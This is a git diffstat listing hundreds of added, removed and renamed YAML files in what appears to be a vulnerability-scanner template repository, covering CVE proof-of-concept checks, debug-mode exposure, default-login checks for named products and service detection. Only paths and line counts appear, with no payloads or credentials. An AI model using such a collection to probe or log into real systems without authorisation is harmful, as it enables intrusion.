poc/cve/cve-2021-31682-6102.yaml | 36 -
poc/cve/cve-2021-31805(1).yaml | 48 -
poc/cve/cve-2021-3223(1).yaml | 35 -
poc/cve/cve-2021-32305-6134.yaml | 31 +
poc/cve/cve-2021-33544-6176.yaml | 23 +
poc/cve/cve-2021-33807-6211.yaml | 38 +
poc/cve/cve-2021-34370-6221.yaml | 17 +
poc/cve/cve-2021-34643-6238.yaml | 42 -
poc/cve/cve-2021-35265-6245.yaml | 33 -
poc/cve/cve-2021-36356(1).yaml | 35 +
poc/cve/cve-2021-37216-6280.yaml | 35 -
poc/cve/cve-2021-37416(1).yaml | 38 +
poc/cve/cve-2021-37580-6292.yaml | 36 +
poc/cve/cve-2021-38702-6314.yaml | 34 +
poc/cve/cve-2021-38704-6317.yaml | 37 -
poc/cve/cve-2021-38751-6320.yaml | 36 +
poc/cve/cve-2021-39211(1).yaml | 31 +
poc/cve/cve-2021-39226-6323.yaml | 30 +
poc/cve/cve-2021-39312(1).yaml | 40 -
poc/cve/cve-2021-41569(1).yaml | 28 -
poc/cve/cve-2021-41691-6460.yaml | 45 -
poc/cve/cve-2021-44103(1).yaml | 69 -
poc/cve/cve-2021-44521-6556.yaml | 56 +
poc/cve/cve-2021-44528(1).yaml | 35 +
poc/cve/cve-2021-45428(1).yaml | 43 +
poc/cve/cve-2021-45968-6588.yaml | 36 -
poc/cve/cve-2021-46381-6597.yaml | 26 -
poc/cve/cve-2021-46417(1).yaml | 32 +
poc/cve/cve-2021-46422(1).yaml | 40 +
poc/cve/cve-2022-0208(1).yaml | 34 -
poc/cve/cve-2022-0543(1).yaml | 35 -
poc/cve/cve-2022-0594(1).yaml | 37 +
poc/cve/cve-2022-0599(1).yaml | 41 +
poc/cve/cve-2022-0952(1).yaml | 47 +
poc/cve/cve-2022-0968(1).yaml | 68 -
poc/cve/cve-2022-1020(1).yaml | 41 -
poc/cve/cve-2022-1221(1).yaml | 37 -
poc/cve/cve-2022-1392(1).yaml | 34 +
poc/cve/cve-2022-1597(1).yaml | 56 -
poc/cve/cve-2022-1713(1).yaml | 37 -
poc/cve/cve-2022-1815(1).yaml | 31 -
poc/cve/cve-2022-1904(1).yaml | 35 -
poc/cve/cve-2022-1906(1).yaml | 39 +
poc/cve/cve-2022-1937(1).yaml | 38 -
poc/cve/cve-2022-21705(1).yaml | 94 -
poc/cve/cve-2022-2187(1).yaml | 36 +
poc/cve/cve-2022-22536-6662.yaml | 56 +
poc/cve/cve-2022-2290(1).yaml | 42 -
poc/cve/cve-2022-22972(1).yaml | 93 +
poc/cve/cve-2022-24681(1).yaml | 43 -
poc/cve/cve-2022-2486(1).yaml | 34 +
poc/cve/cve-2022-2487(1).yaml | 42 -
poc/cve/cve-2022-24899(1).yaml | 35 -
poc/cve/cve-2022-25323-6724.yaml | 24 -
poc/cve/cve-2022-26134(1).yaml | 45 -
poc/cve/cve-2022-26135(1).yaml | 28 +
poc/cve/cve-2022-26352(1).yaml | 41 -
poc/cve/cve-2022-26564(1).yaml | 41 -
poc/cve/cve-2022-26960(1).yaml | 36 +
poc/cve/cve-2022-27927(1).yaml | 38 -
poc/cve/cve-2022-28079(1).yaml | 38 +
poc/cve/cve-2022-28080(1).yaml | 65 -
poc/cve/cve-2022-29014(1).yaml | 31 -
poc/cve/cve-2022-29299(1).yaml | 37 -
poc/cve/cve-2022-29548(1).yaml | 37 +
poc/cve/cve-2022-30073(1).yaml | 63 -
poc/cve/cve-2022-30489(1).yaml | 42 +
poc/cve/cve-2022-30776(1).yaml | 38 -
poc/cve/cve-2022-30777(1).yaml | 38 +
poc/cve/cve-2022-32007(1).yaml | 37 -
poc/cve/cve-2022-32025(1).yaml | 46 -
poc/cve/cve-2022-32028(1).yaml | 46 +
poc/cve/cve-2022-32409(1).yaml | 31 +
poc/cve/cve-2022-33119(1).yaml | 35 +
poc/cve/cve-2022-34046(1).yaml | 34 +
poc/cve/cve-2022-34047(1).yaml | 34 -
poc/cve/cve-2022-34048(1).yaml | 41 +
poc/cve/cve-2022-34049(1).yaml | 41 +
poc/cve/cve-2022-35416(1).yaml | 39 -
poc/cve/cve-2024-23334.yaml | 49 +
poc/cve/resin-cnnvd-200705-315-9866.yaml | 26 -
poc/cve/resin-cnnvd-200705-315-9867.yaml | 25 +
poc/cve/springForShell-CVE-2022-22963.yaml | 36 +
poc/debug/Django-DebugMode.yaml | 8 +-
poc/debug/airflow-debug-231.yaml | 26 +
poc/debug/airflow-debug-233.yaml | 29 -
poc/debug/airflow-debug.yaml | 10 +-
...> android-debug-database-exposed-314.yaml} | 0
.../android-debug-database-exposed-315.yaml | 47 +-
poc/debug/aspx-debug-mode-575.yaml | 31 +
poc/debug/aspx-debug-mode-578.yaml | 33 -
poc/debug/aspx-debug-mode-579.yaml | 2 +
poc/debug/browserless-debugger-794.yaml | 33 +
poc/debug/browserless-debugger.yaml | 29 -
poc/debug/coldfusion-debug-xss-1153.yaml | 31 +
poc/debug/coldfusion-debug-xss.yaml | 34 -
...bled-6788.yaml => debug-enabled-6789.yaml} | 0
poc/debug/debug-enabled-6790.yaml | 15 +
poc/debug/django-debug-detect.yaml | 12 +-
poc/debug/django-debug-exposed-404.yaml | 24 +
poc/debug/django-debug-exposure.yaml | 23 +-
poc/debug/laravel-debug-enabled-8576.yaml | 27 -
poc/debug/laravel-debug-enabled.yaml | 23 -
poc/debug/pyramid-debug-toolbar-9741.yaml | 10 +-
poc/debug/rails-debug-mode-9806.yaml | 17 +
poc/debug/rails-debug-mode-9807.yaml | 17 -
poc/debug/rails-debug-mode.yaml | 17 +-
poc/debug/struts-debug-mode.yaml | 11 +-
poc/debug/symfony-debugmode-10620.yaml | 27 +
poc/debug/wamp-xdebug-detect-11103.yaml | 21 +-
poc/debug/wamp-xdebug-detect-11104.yaml | 16 +
poc/debug/werkzeug-debugger-detect-11198.yaml | 5 +-
...58.yaml => wordpress-debug-log-11259.yaml} | 0
poc/debug/wp-debug-log.yaml | 58 +-
poc/default/JeeSite-default-login.yaml | 5 +-
poc/default/Mantis-Default_login.yaml | 47 +
poc/default/Redmine-Default-Login.yaml | 21 -
poc/default/activemq-default-login-44.yaml | 33 -
poc/default/activemq-default-login-46.yaml | 3 +-
poc/default/activemq-default-login-48.yaml | 29 +
....yaml => aem-default-get-servlet-135.yaml} | 0
poc/default/aem-default-login-140.yaml | 56 -
poc/default/aem-default-login-141.yaml | 8 +-
poc/default/aem-default-login-142.yaml | 12 +-
poc/default/airflow-default-login-236.yaml | 21 +-
poc/default/alphaweb-default-login.yaml | 35 -
poc/default/ambari-default-login-287.yaml | 35 -
poc/default/ambari-default-login-289.yaml | 35 +
poc/default/ambari-default-login-290.yaml | 11 +-
poc/default/apisix-default-login-492.yaml | 20 +-
poc/default/apollo-default-login-520.yaml | 14 +-
...gin-521.yaml => apollo-default-login.yaml} | 0
poc/default/arl-default-login-537.yaml | 44 -
poc/default/arl-default-login-539.yaml | 7 +-
poc/default/arl-default-login-540.yaml | 9 +-
poc/default/arl-default-password.yaml | 4 +
poc/default/azkaban-default-login-674.yaml | 6 +-
...in-673.yaml => azkaban-default-login.yaml} | 0
poc/default/canal-default-login-846.yaml | 44 +
poc/default/canal-default-login-848.yaml | 2 +-
poc/default/canal-default-login-849.yaml | 35 -
.../chinaunicom-default-login-906.yaml | 38 -
.../chinaunicom-default-login-908.yaml | 8 +-
...chinaunicom-modem-default-credentials.yaml | 2 -
...9.yaml => cobbler-default-login-1118.yaml} | 0
poc/default/cobbler-default-login.yaml | 72 -
poc/default/crushftp-default-login.yaml | 59 +
poc/default/cs141-default-login-1277.yaml | 13 +-
poc/default/cs141-default-login-1279.yaml | 18 +-
poc/default/default-apache-test-all-6814.yaml | 4 +-
poc/default/default-apache-test-all.yaml | 29 -
.../default-apache-test-page-6816.yaml | 6 +-
.../default-apache-test-page-6818.yaml | 5 +-
poc/default/default-apache2-page-6804.yaml | 8 +-
poc/default/default-apache2-page-6806.yaml | 5 +-
.../default-apache2-ubuntu-page-6810.yaml | 6 +-
poc/default/default-apache2-ubuntu-page.yaml | 17 -
poc/default/default-asp-net-page-6824.yaml | 5 +-
poc/default/default-asp-net-page.yaml | 17 -
.../default-centos-test-page-6826.yaml | 5 +-
.../default-centos-test-page-6827.yaml | 6 +-
.../default-codeigniter-page-6830.yaml | 7 +-
.../default-codeigniter-page-6832.yaml | 8 +-
.../default-codeigniter-page-6833.yaml | 23 +
poc/default/default-detect-generic-6838.yaml | 25 -
poc/default/default-detect-generic.yaml | 22 +
poc/default/default-django-page-6840.yaml | 5 +-
poc/default/default-django-page-6841.yaml | 10 +-
poc/default/default-fastcgi-page-6844.yaml | 5 +-
poc/default/default-fastcgi-page-6845.yaml | 6 +-
poc/default/default-fedora-page-6848.yaml | 5 +-
poc/default/default-fedora-page-6849.yaml | 10 +-
poc/default/default-iis7-page-6858.yaml | 17 +-
poc/default/default-jetty-page-6862.yaml | 17 +
poc/default/default-jetty-page-6863.yaml | 3 +-
poc/default/default-lighttpd-page-6866.yaml | 22 -
poc/default/default-lighttpd-page-6867.yaml | 5 +-
poc/default/default-lucee-page-6868.yaml | 10 +-
poc/default/default-lucee-page-6871.yaml | 24 +
.../default-microsoft-azure-page-6873.yaml | 9 +-
.../default-microsoft-azure-page-6874.yaml | 6 +-
poc/default/default-movable-page-6878.yaml | 6 +-
poc/default/default-movable-page-6879.yaml | 6 +-
poc/default/default-nginx-page-6880.yaml | 5 +-
poc/default/default-nginx-page-6881.yaml | 19 +
poc/default/default-openresty-6886.yaml | 10 +-
poc/default/default-openresty.yaml | 17 +
.../default-payara-server-page-6894.yaml | 18 -
.../default-payara-server-page-6895.yaml | 10 +-
.../default-payara-server-page-6896.yaml | 4 +-
poc/default/default-plesk-page-6899.yaml | 10 +-
poc/default/default-plesk-page.yaml | 17 -
.../default-redhat-test-page-6902.yaml | 18 -
.../default-redhat-test-page-6903.yaml | 3 +-
.../default-redhat-test-page-6904.yaml | 7 +-
.../default-ssltls-test-page-6907.yaml | 6 +-
.../default-ssltls-test-page-6908.yaml | 7 +-
.../dell-idrac-default-login-6945.yaml | 2 +-
...943.yaml => dell-idrac-default-login.yaml} | 0
.../dell-idrac9-default-login-6930.yaml | 32 +-
.../dell-idrac9-default-login-6932.yaml | 11 +-
.../dolphinscheduler-default-login-7072.yaml | 15 +-
.../dolphinscheduler-default-login-7073.yaml | 48 +
poc/default/druid-default-login-7096.yaml | 2 +-
poc/default/druid-default-login.yaml | 17 +-
...ml => dubbo-admin-default-login-7120.yaml} | 0
.../dubbo-admin-default-login-7121.yaml | 18 +-
poc/default/dvwa-default-login-7129.yaml | 7 -
...ogin-7127.yaml => dvwa-default-login.yaml} | 0
poc/default/emcecom-default-login-7211.yaml | 43 -
poc/default/emcecom-default-login-7212.yaml | 7 +-
poc/default/emqx-default-login-7222.yaml | 35 +
poc/default/emqx-default-login.yaml | 5 +-
.../exacqvision-default-login-7275.yaml | 17 +-
...77.yaml => exacqvision-default-login.yaml} | 0
poc/default/flir-default-login-7514.yaml | 50 -
poc/default/flir-default-login.yaml | 35 +
poc/default/frp-default-login-7556.yaml | 40 -
poc/default/frp-default-login-7557.yaml | 21 +-
poc/default/fuelcms-default-login-7571.yaml | 16 +-
poc/default/fuelcms-default-login-7572.yaml | 20 +-
poc/default/glpi-default-login-7732.yaml | 15 +-
poc/default/glpi-default-login.yaml | 67 +
poc/default/gophish-default-login-7792.yaml | 14 +-
poc/default/gophish-default-login-7793.yaml | 19 +-
poc/default/guacamole-default-login-7858.yaml | 12 +-
poc/default/guacamole-default-login-7859.yaml | 38 +
poc/default/guacamole-default-login-7861.yaml | 10 +-
poc/default/hongdian-default-login-7997.yaml | 58 +
poc/default/hongdian-default-login-7999.yaml | 50 -
.../huawei-HG532e-default-router-login.yaml | 38 -
...awei-hg532e-default-router-login-8063.yaml | 9 +-
poc/default/hue-default-credential-8080.yaml | 16 +-
poc/default/hue-default-credential-8081.yaml | 62 -
poc/default/hue-default-credential.yaml | 62 -
.../ibm-storage-default-credential-8124.yaml | 12 +-
.../ibm-storage-default-credential-8125.yaml | 21 +-
.../idemia-biometrics-default-login-8138.yaml | 17 +-
.../idemia-biometrics-default-login-8139.yaml | 33 -
...idemia-biometrics-default-login-8141.yaml} | 0
poc/default/iptime-default-login-8193.yaml | 48 -
poc/default/iptime-default-login-8194.yaml | 9 -
poc/default/jenkins-default-8270.yaml | 10 +-
...default.yaml => jenkins-default-8272.yaml} | 0
poc/default/jinher-oa-default-login-8311.yaml | 10 +-
poc/default/jinher-oa-default-login-8312.yaml | 52 +
poc/default/jira-login-default.yaml | 8 +-
poc/default/jmx-default-login-8355.yaml | 38 -
poc/default/jmx-default-login.yaml | 42 +
.../jupyterhub-default-login-8399.yaml | 10 +-
.../jupyterhub-default-login-8400.yaml | 35 -
.../kafka-center-default-login-8415.yaml | 13 +-
poc/default/kafka-center-default-login.yaml | 42 +
.../lutron-iot-default-login-8675.yaml | 27 +
.../lutron-iot-default-login-8676.yaml | 6 +
.../lutron-iot-default-login-8678.yaml | 31 -
poc/default/lutron-iot-default-login.yaml | 7 +-
.../mantisbt-default-credential-8778.yaml | 59 +-
poc/default/nagios-default-login-8990.yaml | 44 +
poc/default/nagios-default-login-8994.yaml | 31 -
poc/default/netsus-default-login-9060.yaml | 46 -
poc/default/netsus-default-login.yaml | 33 +
poc/default/nexus-default-login-9088.yaml | 11 +-
poc/default/nexus-default-login-9089.yaml | 16 +-
poc/default/nps-default-login-9145.yaml | 54 -
.../octobercms-default-login-9192.yaml | 65 -
poc/default/octobercms-default-login.yaml | 59 +
poc/default/ofbiz-default-credentials.yaml | 4 +-
poc/default/ofbiz-default-login-9210.yaml | 40 -
poc/default/ofbiz-default-login-9211.yaml | 9 +
poc/default/openemr-default-login-9270.yaml | 6 +-
poc/default/openemr-default-login.yaml | 43 -
poc/default/openwrt-default-login.yaml | 13 +-
...erations-automation-default-page-9337.yaml | 24 -
...rations-automation-default-page-9339.yaml} | 0
poc/default/panabit-default-login-9438.yaml | 12 +-
poc/default/panabit-default-login-9440.yaml | 26 +-
.../panabit-ixcache-default-login-9443.yaml | 14 +-
.../panabit-ixcache-default-login.yaml | 30 +
poc/default/panos-default-login-9454.yaml | 18 +-
poc/default/panos-default-login-9455.yaml | 34 +
poc/default/panos-default-login.yaml | 42 +
poc/default/pentaho-default-login-9477.yaml | 14 +-
poc/default/pentaho-default-login-9478.yaml | 33 -
poc/default/pentaho-default-login-9480.yaml | 42 +
poc/default/rabbitmq-default-admin-9780.yaml | 25 +
poc/default/rabbitmq-default-admin-9782.yaml | 25 -
poc/default/rabbitmq-default-admin.yaml | 2 -
poc/default/rabbitmq-default-login-9783.yaml | 12 +-
poc/default/rabbitmq-default-login-9786.yaml | 12 +-
poc/default/rainloop-default-login-9811.yaml | 19 +-
poc/default/rainloop-default-login.yaml | 44 +
poc/default/rancher-default-login-9814.yaml | 11 +-
poc/default/rancher-default-login-9815.yaml | 12 +-
poc/default/ranger-default-login-9827.yaml | 39 +
poc/default/ranger-default-login-9828.yaml | 15 +-
poc/default/rockmongo-default-login-9897.yaml | 47 +
poc/default/rockmongo-default-login-9899.yaml | 11 +-
poc/default/rseenet-default-login-9913.yaml | 9 +
poc/default/rseenet-default-login-9914.yaml | 6 +-
.../samsung-wlan-default-login-10018.yaml | 45 +
poc/default/seeddms-default-login-10125.yaml | 16 +-
poc/default/seeddms-default-login-10127.yaml | 20 +-
.../sequoiadb-default-login-10150.yaml | 17 +-
poc/default/showdoc-default-login-10221.yaml | 14 +-
.../smartsense-default-login-10330.yaml | 12 +-
.../smartsense-default-login-10331.yaml | 9 +-
poc/default/solarwinds-default-admin.yaml | 42 +-
.../solarwinds-default-login-10356.yaml | 16 +-
.../supermicro-default-login-10572.yaml | 11 +-
poc/default/supermicro-default-login.yaml | 36 +
poc/default/superset-default-login-10574.yaml | 13 +-
poc/default/superset-default-login.yaml | 8 +
poc/default/szhe-default-login-10636.yaml | 10 +-
...gin.yaml => szhe-default-login-10638.yaml} | 0
.../telecom-gateway-default-login-10686.yaml | 14 +-
.../telecom-gateway-default-login.yaml | 33 +
poc/default/tomcat-default-login-10791.yaml | 2 +-
poc/default/tomcat-default-login.yaml | 76 +
.../trilithic-viewpoint-default-10835.yaml | 39 -
poc/default/ucmdb-default-login-10868.yaml | 3 +-
poc/default/ucmdb-default-login-10871.yaml | 41 +
...in-10869.yaml => ucmdb-default-login.yaml} | 0
poc/default/versa-default-login-11003.yaml | 21 +-
poc/default/versa-default-login-11004.yaml | 29 +-
poc/default/vidyo-default-login-11009.yaml | 52 -
...in.yaml => vidyo-default-login-11010.yaml} | 0
.../visionhub-default-login-11026.yaml | 42 +
.../visionhub-default-login-11027.yaml | 12 +-
.../wifisky-default-password-11205.yaml | 38 -
poc/default/wifisky-default-password.yaml | 16 +-
poc/default/wso2-default-login.yaml | 38 -
poc/default/xampp-default-page-11661.yaml | 24 -
...age.yaml => xampp-default-page-11662.yaml} | 0
poc/default/xerox7-default-login-11679.yaml | 21 +-
poc/default/xerox7-default-login.yaml | 46 +
poc/default/xxljob-default-login-11709.yaml | 53 -
poc/default/xxljob-default-login-11712.yaml | 16 +-
poc/default/zabbix-default-credentials.yaml | 7 +-
poc/detect/Biometric-detect.yaml | 31 +-
poc/detect/RedMine-Detect.yaml | 54 +
...nt-detect-32.yaml => acontent-detect.yaml} | 0
...6.yaml => addeventlistener-detect-64.yaml} | 0
poc/detect/addeventlistener-detect.yaml | 16 +-
poc/detect/adobe-coldfusion-detect-82.yaml | 62 -
poc/detect/adobe-coldfusion-detect-83.yaml | 9 +-
.../adobe-coldfusion-error-detect-86.yaml | 29 +
...aml => adobe-coldfusion-error-detect.yaml} | 0
poc/detect/airflow-detect-239.yaml | 24 -
poc/detect/airflow-detect-240.yaml | 24 +
poc/detect/alfresco-detect-258.yaml | 10 +
poc/detect/alfresco-detect-259.yaml | 40 -
poc/detect/alfresco-detect-260.yaml | 33 +
poc/detect/apache-answer-detect.yaml | 45 +
poc/detect/apache-axis-detect-339.yaml | 32 +
...etect.yaml => apache-axis-detect-341.yaml} | 0
poc/detect/apache-cocoon-detect-342.yaml | 33 -
poc/detect/apache-cocoon-detect.yaml | 27 +
...che-detect.yaml => apache-detect-346.yaml} | 0
poc/detect/apache-detect-348.yaml | 60 +-
poc/detect/apollo-server-detect-523.yaml | 37 +
...ect-522.yaml => apollo-server-detect.yaml} | 0
poc/detect/artica-web-proxy-detect-544.yaml | 8 +-
poc/detect/artica-web-proxy-detect-545.yaml | 22 -
...-543.yaml => artica-web-proxy-detect.yaml} | 0
poc/detect/autobahn-python-detect-594.yaml | 30 +
poc/detect/autobahn-python-detect-595.yaml | 29 -
poc/detect/avantfax-detect-598.yaml | 55 +-
poc/detect/avantfax-detect-600.yaml | 31 -
.../aws-elastic-beanstalk-detect-644.yaml | 7 +-
poc/detect/aws-elastic-beanstalk-detect.yaml | 31 -
poc/detect/azure-takeover-detection-683.yaml | 29 +-
...687.yaml => basic-auth-detection-689.yaml} | 0
poc/detect/bigbluebutton-detect-723.yaml | 28 -
poc/detect/bigbluebutton-detect.yaml | 25 +
.../bigip-config-utility-detect-730.yaml | 34 +
.../bigip-config-utility-detect-731.yaml | 2 +-
.../bigip-config-utility-detect-732.yaml | 42 +
poc/detect/burp-api-detect-810.yaml | 28 +
poc/detect/burp-api-detect-812.yaml | 27 -
poc/detect/burp-api-detect.yaml | 3 +-
poc/detect/cacti-detect-826.yaml | 36 -
poc/detect/carestream-vue-detect-859.yaml | 14 +-
poc/detect/carestream-vue-detect-861.yaml | 30 -
poc/detect/centreon-detect-875.yaml | 48 +-
poc/detect/centreon-detect-877.yaml | 24 -
poc/detect/citrix-adc-gateway-detect-981.yaml | 20 -
poc/detect/citrix-adc-gateway-detect-983.yaml | 27 +
poc/detect/citrix-vpn-detect-987.yaml | 16 -
poc/detect/cname-service-detector-1034.yaml | 24 -
poc/detect/cockpit-detect-1125.yaml | 31 +-
...ect-1127.yaml => cockpit-detect-1126.yaml} | 0
poc/detect/confluence-detect-1186.yaml | 14 +-
poc/detect/confluence-detect-1187.yaml | 40 -
poc/detect/confluence-detect-1189.yaml | 41 +
poc/detect/contentkeeper-detect.yaml | 14 +-
poc/detect/craft-cms-detect-1247.yaml | 3 +-
poc/detect/craft-cms-detect.yaml | 28 -
poc/detect/crush-ftp-detect-1271.yaml | 40 +-
poc/detect/crush-ftp-detect-1272.yaml | 21 +
poc/detect/crush-ftp-detect.yaml | 40 +-
poc/detect/csrfguard-detect-1291.yaml | 17 +-
...detect-1290.yaml => csrfguard-detect.yaml} | 0
.../custom-data-result-service-detect.yaml | 20 +
.../custom-datadump-source-code-detect.yaml | 3 +-
poc/detect/darkstat-detect-6767.yaml | 16 +-
poc/detect/default-detect-generic-6838.yaml | 25 -
poc/detect/default-detect-generic.yaml | 22 +
poc/detect/dell-idrac6-detect-6918.yaml | 8 +-
poc/detect/dell-idrac6-detect-6920.yaml | 9 +-
poc/detect/dell-idrac7-detect-6922.yaml | 15 +-
poc/detect/dell-idrac7-detect.yaml | 25 +
poc/detect/dell-idrac9-detect-6936.yaml | 14 +-
poc/detect/dell-idrac9-detect-6937.yaml | 36 +
poc/detect/detect-dangling-cname-6967.yaml | 32 +
poc/detect/detect-dangling-cname-6968.yaml | 25 +-
poc/detect/detect-drone-config-6972.yaml | 7 +-
poc/detect/detect-drone-config-6973.yaml | 25 +
poc/detect/detect-jabber-xmpp-6975.yaml | 7 +-
poc/detect/detect-jabber-xmpp.yaml | 23 +-
...8.yaml => detect-options-method-6977.yaml} | 0
poc/detect/detect-sentry-6983.yaml | 11 +-
poc/detect/detection-zookeeper.yaml | 53 +-
poc/detect/django-debug-detect.yaml | 12 +-
poc/detect/dns-waf-detect-7052.yaml | 172 +
poc/detect/dns-waf-detect-7054.yaml | 34 -
poc/detect/dns-waf-detect.yaml | 38 +-
poc/detect/druid-detect-7098.yaml | 24 -
poc/detect/druid-detect.yaml | 13 +-
poc/detect/dwr-index-detect-7135.yaml | 29 +
poc/detect/dwr-index-detect.yaml | 24 +
poc/detect/ec2-detection-7162.yaml | 18 -
poc/detect/ec2-detection-7163.yaml | 24 +
poc/detect/eg-manager-detect.yaml | 20 +
.../elasticsearch-sql-client-detect-7190.yaml | 21 +
.../elasticsearch-sql-client-detect-7192.yaml | 4 +-
poc/detect/elfinder-detect-7201.yaml | 12 +-
poc/detect/elfinder-detect-7202.yaml | 15 +-
poc/detect/epson-access-detect-7235.yaml | 40 +
poc/detect/epson-access-detect.yaml | 21 +-
poc/detect/epson-web-control-detect-7239.yaml | 13 +-
poc/detect/epson-web-control-detect-7242.yaml | 10 +-
poc/detect/fanruanoa-detect-7391.yaml | 1 -
poc/detect/fanruanoa-detect-7392.yaml | 29 +
poc/detect/fanruanoa2012-detect-7388.yaml | 26 +
poc/detect/fanruanoa2012-detect.yaml | 21 -
poc/detect/favicon-detection-7441.yaml | 2026 -
poc/detect/favicon-detection-7446.yaml | 97 +-
poc/detect/froxlor-detect-7551.yaml | 9 +-
poc/detect/froxlor-detect-7553.yaml | 27 +
poc/detect/gespage-detect-7603.yaml | 24 +
poc/detect/gespage-detect.yaml | 48 +-
poc/detect/getsimple-cms-detect-7614.yaml | 8 +-
poc/detect/getsimple-cms-detect-7615.yaml | 9 +-
poc/detect/gitbook-detect-7623.yaml | 32 +-
poc/detect/gitbook-detect-7624.yaml | 5 +-
poc/detect/github-enterprise-detect-7649.yaml | 19 +
poc/detect/github-enterprise-detect-7650.yaml | 19 +-
poc/detect/gradle-cache-node-detect-7797.yaml | 3 +-
poc/detect/grafana-detect-7805.yaml | 6 +
poc/detect/grafana-detect-7808.yaml | 23 -
poc/detect/graphql-detect-7830.yaml | 158 +
poc/detect/graphql-detect-7831.yaml | 158 -
poc/detect/grav-cms-detect-7842.yaml | 3 +-
poc/detect/grav-cms-detect.yaml | 27 -
poc/detect/gunicorn-detect-7862.yaml | 25 -
poc/detect/gunicorn-detect-7863.yaml | 10 +-
poc/detect/hanwang-detect-7881.yaml | 8 +-
poc/detect/hanwang-detect-7882.yaml | 8 +-
poc/detect/harbor-detect-7886.yaml | 19 -
poc/detect/herokuapp-detect-7937.yaml | 19 -
poc/detect/herokuapp-detect-7939.yaml | 16 -
poc/detect/herokuapp-detect.yaml | 8 +-
poc/detect/hikvision-detection-7954.yaml | 25 +
poc/detect/hikvision-detection-7955.yaml | 27 +
poc/detect/hikvision-detection.yaml | 8 +-
poc/detect/hp-blade-admin-detect-8004.yaml | 24 -
poc/detect/hp-blade-admin-detect-8005.yaml | 46 +-
poc/detect/hp-device-info-detect-8009.yaml | 22 +
poc/detect/hp-device-info-detect-8010.yaml | 35 -
poc/detect/hp-device-info-detect.yaml | 15 +-
poc/detect/hp-laserjet-detect-8027.yaml | 19 +-
poc/detect/hp-laserjet-detect-8028.yaml | 5 +-
poc/detect/hp-media-vault-detect-8030.yaml | 28 -
poc/detect/hp-media-vault-detect-8031.yaml | 1 -
poc/detect/htpasswd-detection-8046.yaml | 25 +
poc/detect/ilo-detect-8154.yaml | 73 +-
poc/detect/influxdb-detect-8160.yaml | 11 +-
poc/detect/influxdb-detect.yaml | 11 +-
poc/detect/iplanet-imap-detect.yaml | 21 +-
poc/detect/itop-detect-8203.yaml | 24 -
poc/detect/itop-detect.yaml | 15 +-
poc/detect/jaspersoft-detect-8220.yaml | 16 -
poc/detect/java-rmi-detect-8227.yaml | 17 +
poc/detect/java-rmi-detect.yaml | 17 +-
poc/detect/jboss-detect-8237.yaml | 34 +
poc/detect/jboss-detect.yaml | 22 -
poc/detect/jeecg-boot-detect-8247.yaml | 6 +-
poc/detect/jeecg-boot-detect-8248.yaml | 21 -
poc/detect/jellyfin-detect-8257.yaml | 7 +-
poc/detect/jellyfin-detect-8259.yaml | 31 +
...-detect-8258.yaml => jellyfin-detect.yaml} | 0
poc/detect/jenkins-detect-8275.yaml | 27 -
poc/detect/jenkins-detect-8276.yaml | 34 +
poc/detect/jira-detect-8313.yaml | 25 +
poc/detect/jira-detect-8314.yaml | 29 -
poc/detect/jira-detect-8316.yaml | 4 +
poc/detect/jsf-detection-8397.yaml | 19 -
poc/detect/jsf-detection-8398.yaml | 31 +
poc/detect/jsf-detection.yaml | 31 +-
poc/detect/kevinlab-device-detect-8461.yaml | 12 +-
poc/detect/kevinlab-device-detect-8462.yaml | 10 +-
...tect-8484.yaml => kibana-detect-8483.yaml} | 0
poc/detect/kong-detect-8499.yaml | 30 +-
poc/detect/kong-detect-8501.yaml | 28 +-
poc/detect/linkerd-detect-8633.yaml | 36 +
...d-detect-8632.yaml => linkerd-detect.yaml} | 0
poc/detect/linkerd-service-detect-8634.yaml | 38 +
poc/detect/linkerd-service-detect.yaml | 6 +-
poc/detect/magento-detect-8706.yaml | 8 +-
poc/detect/magmi-detect-8714.yaml | 2 +-
poc/detect/magmi-detect-8715.yaml | 19 -
poc/detect/magmi-detect-8716.yaml | 22 +
poc/detect/maian-cart-detect-8719.yaml | 21 -
poc/detect/maian-cart-detect.yaml | 14 +
poc/detect/mantis-detect-8780.yaml | 15 +
poc/detect/metabase-detect-8804.yaml | 35 -
poc/detect/metabase-detect.yaml | 21 +-
...microsoft-exchange-server-detect-8853.yaml | 33 +
...microsoft-exchange-server-detect-8854.yaml | 26 +
poc/detect/microweber-detect-8863.yaml | 5 +-
poc/detect/microweber-detect.yaml | 14 +-
poc/detect/minio-detect-8892.yaml | 44 +-
poc/detect/minio-detect-8894.yaml | 46 +-
poc/detect/moinmoin-detect-8916.yaml | 30 +
poc/detect/moinmoin-detect.yaml | 2 +-
poc/detect/mongodb-detect-8920.yaml | 20 +
poc/detect/mongodb-detect.yaml | 20 +-
poc/detect/moveit-detect.yaml | 37 +
poc/detect/moveit-transfer-detect.yaml | 34 -
poc/detect/ms-adcs-detect-8960.yaml | 24 -
poc/detect/ms-adcs-detect-8961.yaml | 29 +
poc/detect/ms-adcs-detect.yaml | 7 +-
poc/detect/neos-detect-9013.yaml | 15 +-
poc/detect/neos-detect.yaml | 27 +
poc/detect/netdata-dashboard-detected.yaml | 18 +-
poc/detect/nextcloud-detect-9079.yaml | 48 +
poc/detect/oauth2-detect-9181.yaml | 32 -
poc/detect/oauth2-detect-9182.yaml | 51 +-
poc/detect/octobercms-detect-9195.yaml | 25 -
poc/detect/octobercms-detect-9196.yaml | 12 +-
poc/detect/oidc-detect-9216.yaml | 1 -
poc/detect/oidc-detect.yaml | 21 +
poc/detect/oipm-detect-9219.yaml | 23 +
poc/detect/oipm-detect-9222.yaml | 14 -
poc/detect/olivetti-crf-detect-9244.yaml | 28 -
poc/detect/oneblog-detect-9246.yaml | 21 +
poc/detect/oneblog-detect-9247.yaml | 10 +-
...en-virtualization-manager-detect-9325.yaml | 19 +-
.../open-virtualization-manager-detect.yaml | 31 +
poc/detect/openam-detection-9257.yaml | 54 +-
poc/detect/openam-detection.yaml | 57 +-
poc/detect/openemr-detect-9271.yaml | 21 -
poc/detect/openemr-detect-9273.yaml | 3 +-
poc/detect/openemr-detect-9274.yaml | 25 +
poc/detect/opensis-detect-9313.yaml | 36 -
poc/detect/openx-detect.yaml | 5 -
poc/detect/oracle-dbass-detect-9350.yaml | 1 -
poc/detect/oracle-dbass-detect-9351.yaml | 21 -
poc/detect/oracle-dbass-detect.yaml | 18 -
.../owasp-juice-shop-detected-9416.yaml | 21 +
...18.yaml => owasp-juice-shop-detected.yaml} | 0
poc/detect/pega-detect-9474.yaml | 3 +-
poc/detect/pega-detect.yaml | 22 -
poc/detect/php-proxy-detect-9544.yaml | 8 +-
poc/detect/php-proxy-detect.yaml | 26 -
poc/detect/phpcollab-detect-9499.yaml | 21 +
